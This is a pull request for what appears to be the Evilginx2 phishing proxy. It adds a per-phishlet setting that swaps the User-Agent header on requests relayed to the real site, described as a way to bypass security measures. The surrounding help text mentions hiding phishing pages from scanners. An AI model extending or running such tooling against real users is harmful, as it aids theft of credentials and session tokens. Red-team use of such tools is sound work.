### PR TITLE
New Feature: Set Custom User-Agent for Phishlets

### DIFF
--- a/core/config.go
+++ b/core/config.go
@@ -41,6 +41,7 @@ type PhishletConfig struct {
 	UnauthUrl string `mapstructure:"unauth_url" json:"unauth_url" yaml:"unauth_url"`
 	Enabled   bool   `mapstructure:"enabled" json:"enabled" yaml:"enabled"`
 	Visible   bool   `mapstructure:"visible" json:"visible" yaml:"visible"`
+	CustomUA  string `mapstructure:"custom_ua" json:"custom_ua" yaml:"custom_ua"`
 }
 
 type ProxyConfig struct {
@@ -199,6 +200,7 @@ func (c *Config) PhishletConfig(site string) *PhishletConfig {
 		o := &PhishletConfig{
 			Hostname:  "",
 			UnauthUrl: "",
+			CustomUA: "",
 			Enabled:   false,
 			Visible:   true,
 		}
@@ -255,6 +257,28 @@ func (c *Config) SetSiteUnauthUrl(site string, _url string) bool {
 	}
 	log.Info("phishlet '%s' unauth_url set to: %s", site, _url)
 	c.PhishletConfig(site).UnauthUrl = _url
+	c.SavePhishlets()
+	return true
+}
+
+func (c *Config) SetSiteCustomUa(site string, custom_ua string) bool {
+	pl, err := c.GetPhishlet(site)
+	if err != nil {
+		log.Error("%v", err)
+		return false
+	}
+	if pl.isTemplate {
+		log.Error("phishlet is a template - can't set custom user-agent")
+		return false
+	}
+	if custom_ua != "" {
+		if len(custom_ua) > 256 {
+            log.Error("user-agent string is too long")
+            return false
+        }
+	}
+	log.Info("phishlet '%s' custom_ua set to: %s", site, custom_ua)
+	c.PhishletConfig(site).CustomUA = custom_ua
 	c.SavePhishlets()
 	return true
 }
@@ -776,6 +800,13 @@ func (c *Config) GetSiteDomain(site string) (string, bool) {
 func (c *Config) GetSiteUnauthUrl(site string) (string, bool) {
 	if o, ok := c.phishletConfig[site]; ok {
 		return o.UnauthUrl, ok
+	}
+	return "", false
+}
+
+func (c *Config) GetSiteCustomUa(site string) (string, bool) {
+	if o, ok := c.phishletConfig[site]; ok {
+		return o.CustomUA, ok
 	}
 	return "", false
 }

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -179,6 +179,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 			}
 
+			// inject custom user-agent if set
+			plet := p.getPhishletByPhishHost(req.Host)
+			originalUA := req.Header.Get("User-Agent")
+			if plet != nil {
+				customUA, ok := p.cfg.GetSiteCustomUa(plet.Name)
+				if ok && customUA != "" {
+					req.Header.Set("User-Agent", customUA)
+					log.Debug("Injected custom User-Agent for phishlet '%s': %s", plet.Name, customUA)
+				}
+			}
+
 			if p.cfg.GetBlacklistMode() != "off" {
 				if p.bl.IsBlacklisted(from_ip) {
 					if p.bl.IsVerbose() {
@@ -397,7 +408,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 									sid := p.last_sid
 									p.last_sid += 1
-									log.Important("[%d] [%s] new visitor has arrived: %s (%s)", sid, hiblue.Sprint(pl_name), req.Header.Get("User-Agent"), remote_addr)
+									log.Important("[%d] [%s] new visitor has arrived: %s (%s)", sid, hiblue.Sprint(pl_name), originalUA, remote_addr)
 									log.Info("[%d] [%s] landing URL: %s", sid, hiblue.Sprint(pl_name), req_url)
 									p.sessions[session.Id] = session
 									p.sids[session.Id] = sid

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -693,6 +693,13 @@ func (t *Terminal) handlePhishlets(args []string) error {
 			}
 			t.cfg.SetSiteUnauthUrl(args[1], args[2])
 			return nil
+		case "custom_ua":
+			_, err := t.cfg.GetPhishlet(args[1])
+			if err != nil {
+				return err
+			}
+			t.cfg.SetSiteCustomUa(args[1], args[2])
+			return nil
 		}
 	}
 	return fmt.Errorf("invalid syntax: %s", args)
@@ -1190,7 +1197,8 @@ func (t *Terminal) createHelp() {
 			readline.PcItem("hostname", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("enable", readline.PcItemDynamic(t.phishletPrefixCompleter)),
 			readline.PcItem("disable", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("hide", readline.PcItemDynamic(t.phishletPrefixCompleter)),
 			readline.PcItem("unhide", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-hosts", readline.PcItemDynamic(t.phishletPrefixCompleter)),
-			readline.PcItem("unauth_url", readline.PcItemDynamic(t.phishletPrefixCompleter))))
+			readline.PcItem("unauth_url", readline.PcItemDynamic(t.phishletPrefixCompleter)),
+			readline.PcItem("custom_ua", readline.PcItemDynamic(t.phishletPrefixCompleter))))
 	h.AddSubCommand("phishlets", nil, "", "show status of all available phishlets")
 	h.AddSubCommand("phishlets", nil, "<phishlet>", "show details of a specific phishlets")
 	h.AddSubCommand("phishlets", []string{"create"}, "create <phishlet> <child_name> <key1=value1> <key2=value2>", "create child phishlet from a template phishlet with custom parameters")
@@ -1202,6 +1210,7 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("phishlets", []string{"hide"}, "hide <phishlet>", "hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)")
 	h.AddSubCommand("phishlets", []string{"unhide"}, "unhide <phishlet>", "makes the phishing page available and reachable from the outside")
 	h.AddSubCommand("phishlets", []string{"get-hosts"}, "get-hosts <phishlet>", "generates entries for hosts file in order to use localhost for testing")
+	h.AddSubCommand("phishlets", []string{"custom_ua"}, "custom_ua <phishlet> \"<ua>\"", "set custom user-agent for the current phishlet. note: wrap it in quotes")
 
 	h.AddCommand("sessions", "general", "manage sessions and captured tokens with credentials", "Shows all captured credentials and authentication tokens. Allows to view full history of visits and delete logged sessions.", LAYER_TOP,
 		readline.PcItem("sessions", readline.PcItem("delete", readline.PcItem("all"))))
@@ -1357,7 +1366,7 @@ func (t *Terminal) sprintPhishletStatus(site string) string {
 	higray := color.New(color.FgWhite)
 	logray := color.New(color.FgHiBlack)
 	n := 0
-	cols := []string{"phishlet", "status", "visibility", "hostname", "unauth_url"}
+	cols := []string{"phishlet", "status", "visibility", "hostname", "unauth_url", "custom_ua"}
 	var rows [][]string
 
 	var pnames []string
@@ -1386,6 +1395,7 @@ func (t *Terminal) sprintPhishletStatus(site string) string {
 			}
 			domain, _ := t.cfg.GetSiteDomain(s)
 			unauth_url, _ := t.cfg.GetSiteUnauthUrl(s)
+			custom_ua, _ := t.cfg.GetSiteCustomUa(s)
 			n += 1
 
 			if s == site {
@@ -1400,11 +1410,11 @@ func (t *Terminal) sprintPhishletStatus(site string) string {
 					}
 				}
 
-				keys := []string{"phishlet", "parent", "status", "visibility", "hostname", "unauth_url", "params"}
-				vals := []string{hiblue.Sprint(s), blue.Sprint(pl.ParentName), status, hidden_status, cyan.Sprint(domain), logreen.Sprint(unauth_url), logray.Sprint(param_names)}
+				keys := []string{"phishlet", "parent", "status", "visibility", "hostname", "unauth_url", "params", "custom_ua"}
+				vals := []string{hiblue.Sprint(s), blue.Sprint(pl.ParentName), status, hidden_status, cyan.Sprint(domain), logreen.Sprint(unauth_url), logray.Sprint(param_names), logreen.Sprint(custom_ua)}
 				return AsRows(keys, vals)
 			} else if site == "" {
-				rows = append(rows, []string{hiblue.Sprint(s), status, hidden_status, cyan.Sprint(domain), logreen.Sprint(unauth_url)})
+				rows = append(rows, []string{hiblue.Sprint(s), status, hidden_status, cyan.Sprint(domain), logreen.Sprint(unauth_url), logreen.Sprint(custom_ua)})
 			}
 		}
 	}


### PR DESCRIPTION
A `custom_ua` field has been added to each phishlet in the configuration. Allows users to specify a custom User-Agent, which will be injected into the HTTP request before sending it to the server.

Some websites deliver different content depending on the User-Agent, and manipulating the User-Agent can help bypass certain security measures.

**Usage:** 
Simply update the `custom_ua` field like so: `phishlets custom_ua <phishlet> "<ua>"`

![custom_ua_3](https://github.com/user-attachments/assets/81a73718-72a4-458e-bce9-5ed414c1d325)

**Log output:**
NOTE: When a "new visitor has arrived" it will print the original User-Agent but will send to the server the custom one.
![custom_ua_5](https://github.com/user-attachments/assets/b14383ac-6867-4a23-b092-e5d2e6d5685c)


Also, Thanks to @An0nUD4Y for his [solution](https://github.com/An0nUD4Y/Evilginx2-Phishlets/blob/master/README.md#add-custom-user-agent), which inspired this addition.